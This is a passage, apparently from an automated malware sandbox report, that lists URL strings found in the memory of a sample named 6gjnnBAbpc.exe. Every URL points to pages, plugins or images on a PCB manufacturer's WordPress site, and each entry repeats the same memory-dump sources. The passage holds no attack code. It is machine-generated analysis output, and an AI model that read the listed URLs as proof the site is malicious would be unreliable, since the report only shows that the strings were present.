http://www.myropcb.com/why-use-myro/our-facilities/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/privacy-policy/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/referral-program/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/rohs/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/satisfaction-guarantee/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/shipping-cost/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/terms-of-service/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.2.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/lightbox-2/lightbox.js?ver=1.8
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/plugins/wp-simple-firewall/resources/js/shield/notbot.js?ver=17.0.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/login1.gif
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/register1.gif
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.png
